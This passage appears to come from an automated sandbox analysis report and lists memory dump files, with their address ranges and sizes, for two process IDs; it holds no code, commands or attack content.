                                                                                                                                • memory/4876-266-0x0000000007370000-0x000000000737E000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  56KB

                                                                                                                                • memory/4876-256-0x0000000007330000-0x0000000007341000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  68KB

                                                                                                                                • memory/4876-255-0x00000000073C0000-0x0000000007456000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  600KB

                                                                                                                                • memory/4876-254-0x00000000071A0000-0x00000000071AA000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  40KB

                                                                                                                                • memory/4876-252-0x0000000007770000-0x0000000007DEA000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  6.5MB

                                                                                                                                • memory/4876-253-0x0000000007130000-0x000000000714A000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  104KB

                                                                                                                                • memory/4876-251-0x0000000006DF0000-0x0000000006E93000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  652KB

                                                                                                                                • memory/4876-23-0x0000000073E9E000-0x0000000073E9F000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/4876-240-0x0000000074770000-0x00000000747BC000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  304KB

                                                                                                                                • memory/4876-239-0x00000000063D0000-0x0000000006402000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  200KB

                                                                                                                                • memory/4876-129-0x0000000004E20000-0x0000000004E42000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  136KB

                                                                                                                                • memory/4876-144-0x0000000005800000-0x0000000005B54000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  3.3MB

                                                                                                                                • memory/4876-211-0x0000000005E30000-0x0000000005E7C000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  304KB

                                                                                                                                • memory/4876-131-0x0000000005720000-0x0000000005786000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  408KB

                                                                                                                                • memory/4876-132-0x0000000005790000-0x00000000057F6000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  408KB

                                                                                                                                • memory/4876-120-0x0000000073E90000-0x0000000074640000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  7.7MB

                                                                                                                                • memory/4876-110-0x00000000050F0000-0x0000000005718000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  6.2MB

                                                                                                                                • memory/4876-111-0x0000000073E90000-0x0000000074640000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  7.7MB

                                                                                                                                • memory/4876-30-0x0000000002840000-0x0000000002876000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  216KB

                                                                                                                                • memory/5288-344-0x000001CA5ABF0000-0x000001CA5ABF8000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  32KB